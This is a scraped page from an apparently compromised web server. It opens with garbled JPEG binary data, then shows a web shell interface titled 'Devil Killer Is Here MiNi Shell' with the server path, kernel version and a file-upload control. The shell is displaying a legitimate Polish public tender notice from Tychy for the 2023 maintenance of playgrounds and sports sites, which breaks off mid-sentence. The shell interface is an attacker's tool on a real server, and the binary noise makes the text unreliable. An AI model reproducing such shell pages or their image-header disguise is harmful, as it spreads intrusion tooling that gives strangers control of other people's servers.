JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221118/0044756201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Utrzymanie gminnych placów zabaw i miejsc rekreacyjno – sportowych w Tychach w 2023 r. – Zadanie nr 1, Zadanie nr 2 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTA TYCHY</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Tyski Zakład Usług Komunalnych w Tychach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 278348986</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Niepodległości 49</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tychy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@tzuk.tychy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://tzuk.tychy.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie nieruchomościami wykonane na zlecenie </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utrzymanie gminnych placów zabaw i miejsc rekreacyjno – sportowych w Tychach w 2023 r. – Zadanie nr 1, Zadanie nr 2 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-770b2328-674b-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00447562</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00015386/25/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.15 Utrzymanie gminnych placów zabaw i miejsc rekreacyjno – sportowych w Tychach w 2023 roku – Zadanie nr 1, Zadanie nr 2</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://tzuk-tychy.logintrade.net/zapytania_email,108385,2037d1e17a9bdfe79bfb897d8fb6e319.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">adres e-mail: zamowienia@tzuk.tychy.pl<br/>Platforma przetargowa: https://tzuk-tychy.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Ofertę składa się pod rygorem<br/>nieważności, zgodnie z wyborem Wykonawcy:<br/>- w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym),<br/>- w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2. Wykonawca zamierzający złożyć ofertę (wyłącznie przez Platformę przetargową) – zobowiązany jest zapoznać się z instrukcjami<br/>użytkowników Platformy przetargowej – dostępnymi pod adresem: https://tzuk-tychy.logintrade.net/rejestracja/ustawowe.html oraz<br/>zaakceptować regulamin korzystania z Platformy przetargowej dostępnym pod adresem: https://tzuktychy.<br/>logintrade.net/rejestracja/regulamin.html. 3. Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o<br/>którym mowa w ust.2. 4.Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie<br/>internetowej Platformy przetargowej pod adresem:<br/>https://tzuk-tychy.logintrade.net/rejestracja/instrukcje.html. 5. Wsparcia technicznego w zakresie działania Platformy przetargowej<br/>udziela jej dostawca, tj.: Logintrade S.A. ul. Legnicka 57D, lokal B/J, 54 – 203 Wrocław, nr tel. 71 787 35 34, e-mail:<br/>helpdesk@logintrade.net od poniedziałku do piątku (w dni robocze) w godz. 8:00 – 16:00. 6. Sposoby złożenia oferty za<br/>pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia oferty (w zależności od wyboru opcji z logowaniem lub bez<br/>logowania), zostały opisane w Instrukcjach użytkowników Platformy przetargowej. 7. Oferty,<br/>oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art.<br/>117 ust. 4 ustawy oraz zobowiązanie podmiotu udostepniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy, zwane dalej<br/>„zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci<br/>elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o<br/>informatyzacji działalności podmiotów realizujących zadania publiczne, z<br/>zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych. Pozostałe<br/>postanowienia zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1 ze zm.), dalej „RODO”, Zamawiający informuje, że:1.1.Administratorem danych<br/>osobowych jest Tyski Zakład Usług Komunalnych w Tychach, ul. Budowlanych 43, 43-100 Tychy.1.2.Administrator wyznaczył<br/>Inspektora Ochrony Danych Osobowych, z którym można się skontaktować w sprawach związanych z ochroną danych osobowych,<br/>w następujący sposób:1.2.1. pod adresem poczty elektronicznej: iod@tzuk.tychy.pl,1.2.2.pisemnie na adres siedziby<br/>Administratora.1.3.Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego.1.4.Odbiorcami danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych.1.5.Dane osobowe będą przechowywane jedynie w okresie niezbędnym do spełnienia celu, dla którego zostały zebrane<br/>lub w okresie przewidzianym przepisami prawa.1.6.Po spełnieniu celu, dla którego dane zostały zebrane, mogą one być<br/>przechowywane jedynie w celach archiwalnych, przez okres, który wyznaczony zostanie przede wszystkim na podstawie<br/>rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji<br/>w sprawie organizacji i zakresu działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej.1.7.Obowiązek<br/>podania danych osobowych bezpośrednio dotyczących Wykonawcy/Podwykonawcy/Podmiotu, na zasoby którego powołuje się<br/>Wykonawca, jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp.1.8.W odniesieniu do<br/>udostępnionych danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO.1.9.Osoba udostępniająca dane posiada: 1.9.1.na podstawie art. 15 RODO prawo dostępu do danych osobowych jej<br/>dotyczących, 1.9.2.na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników), 1.9.3. na podstawie art. 18<br/>RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie<br/>ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu<br/>ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.), 1.9.4. prawo do<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych jej dotyczących<br/>narusza przepisy RODO. 1.10.Osobie<br/>udostępniającej dane nie przysługuje: 1.10.1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>1.10.2.prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>1.10.3. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. 1.11.Wykonawca który powołuje się na zasoby<br/>Podwykonawcy/Podmiotu składa oświadczenie w zakresie wypełnienia<br/>obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO (pkt 3.6. załącznika nr 1A do SWZ – dla Zadania nr 1,<br/>załącznika nr 1B do SWZ – dla Zadania nr 2).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DO.261.26.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie nr 1 - Bieżące utrzymanie, przeglądy, naprawy, konserwacje urządzeń zabawowych i siłowni plenerowych.<br/><br/>2. Zakres rzeczowy przedmiotu zamówienia obejmuje m.in.:<br/>2.1.systematyczne kontrole i bieżące utrzymanie urządzeń zabawowych, siłowych oraz małej architektury,<br/>2.2.kontrola pięcioletnia,<br/>2.3.zamiatanie nawierzchni utwardzonych i z poliuretanu na placach zabaw,<br/>2.4.demontaż (likwidacja) zniszczonych urządzeń/elementów zabawowych, siłowych oraz małej architektury,<br/>2.5.zakup i wymiana lub montaż nowych elementów urządzeń zabawowych, siłowych oraz małej architektury,<br/>2.6.malowanie urządzeń/elementów zabawowych, siłowych i małej architektury,<br/>2.7.koszenie trawy na placach zabaw.<br/><br/>3. Szczegółowy opis przedmiotu zamówienia oraz wymagania Zamawiającego względem przedmiotu zamówienia zostały określone w:<br/>3.1. Załączniku nr 2A do SWZ: opis przedmiotu zamówienia,<br/>3.2. Załączniku nr 3A do SWZ: kosztorys ofertowy zawierający wykaz prac związanych z wykonaniem zakresu rzeczowego,<br/>3.3. Załączniku nr 4A do SWZ: tabela cen jednostkowych zawierająca wykaz elementów związanych z wykonaniem zakresu<br/>rzeczowego,<br/>3.4. Załączniku nr 5A do SWZ: wykaz i lokalizacja placów zabaw i siłowni plenerowych,<br/>3.5. Załączniku nr 6A do SWZ: projektowane postanowienia umowne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77320000-9 - Usługi utrzymania terenów sportowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50870000-4 - Usługi w zakresie napraw i konserwacji wyposażenia placów zabaw</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas naprawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na przystąpienie do usunięcia zagrożenia bezpieczeństwa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie nr 2 – Bieżące utrzymanie, przeglądy, naprawy, konserwacje miejsc rekreacyjno-sportowych.<br/><br/>2. Zakres rzeczowy przedmiotu zamówienia obejmuje m.in.:<br/>2.1.systematyczne kontrole i bieżące utrzymanie obiektów rekreacyjno-sportowych tj.: Pumptracki – tory rowerowe, Skate<br/>Park - budowla sportowa, Street Workout - plac do ćwiczeń, Rolkostrady – tor do jazdy na rolkach, urządzeń sportowych przy ul. Pod Lasem, boiska wielofunkcyjnego przy ul. Nowa/Zgody, Tor do gry w bule,<br/>2.2.kontrola pięcioletnia,<br/>2.3.utrzymanie czystości i porządku na wszystkich obiektach rekreacyjno-sportowych oraz zamiatanie nawierzchni na Skate<br/>Parku,<br/>2.4.demontaż (likwidacja) zniszczonych elementów na wszystkich obiektach rekreacyjno-sportowych,<br/>2.5.naprawa chodnika wokół nawierzchni Skate Parku,<br/>2.6.naprawa barierki na urządzeniach Skate Parku.<br/><br/>3. Szczegółowy opis przedmiotu zamówienia oraz wymagania Zamawiającego względem przedmiotu zamówienia zostały<br/>określone w:<br/>3.1. Załączniku nr 2B do SWZ: opis przedmiotu zamówienia,<br/>3.2. Załączniku nr 3B do SWZ: kosztorys ofertowy zawierający wykaz prac związanych z wykonaniem zakresu rzeczowego,<br/>3.3. Załączniku nr 4B do SWZ: wykaz i lokalizacja miejsc rekreacyjno-sportowych,<br/>3.4. Załączniku nr 5B do SWZ: projektowane postanowienia umowne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77320000-9 - Usługi utrzymania terenów sportowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45212290-5 - Usługi napraw i konserwacji obiektów sportowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na przystąpienie do usunięcia zagrożenia bezpieczeństwa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.Warunki udziału w postępowaniu określone przez Zamawiającego:<br/>1.1.W postępowaniu o udzielenie zamówienia publicznego udział mogą brać Wykonawcy, którzy spełniają warunki udziału w<br/>zakresie sytuacji ekonomicznej lub finansowej, tj.:<br/>1.1.1. Zamawiający wymaga, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż:<br/>1.1.1.1. 100.000,00 zł (dla Zadania nr 1),<br/>1.1.1.2. 20.000.00 zł (dla Zadania nr 2),<br/>1.1.1.3. W przypadku złożenia oferty na obie części, Zamawiający wymaga by Wykonawca był ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę nie<br/>mniejszą niż 120.000,00 zł.<br/>1.1.1.4.Zamawiający zastrzega, że w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach<br/>określonych w art. 118 Ustawy, warunek o którym wyżej mowa, musi zostać spełniony w całości przez Wykonawcę (jednego<br/>z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca.<br/>1.2.W postępowaniu o udzielenie zamówienia publicznego udział mogą brać Wykonawcy, którzy spełniają warunki udziału w<br/>zakresie zdolności technicznej lub zawodowej, tj.:<br/>1.2.1. Zamawiający wymaga, aby Wykonawca w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał, a w przypadku świadczeń okresowych lub<br/>ciągłych – wykonuje co najmniej jedną (1) (zrealizowaną lub realizowaną w ramach jednej umowy) usługę utrzymania lub<br/>usługę<br/>utrzymania wraz z naprawami plenerowych urządzeń zabawowych lub sportowych lub rekreacyjnych o wartości min. 50<br/>000,00 zł brutto - usługa ta powinna być realizowana w sposób ciągły przez okres nie krótszy niż 6 miesięcy w ramach<br/>jednej umowy (dotyczy Zadania nr 1).<br/>1.2.2. Zamawiający wymaga, aby Wykonawca w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał, a w przypadku świadczeń okresowych lub<br/>ciągłych – wykonuje co najmniej jedną (1) (zrealizowaną lub realizowaną w ramach jednej umowy) 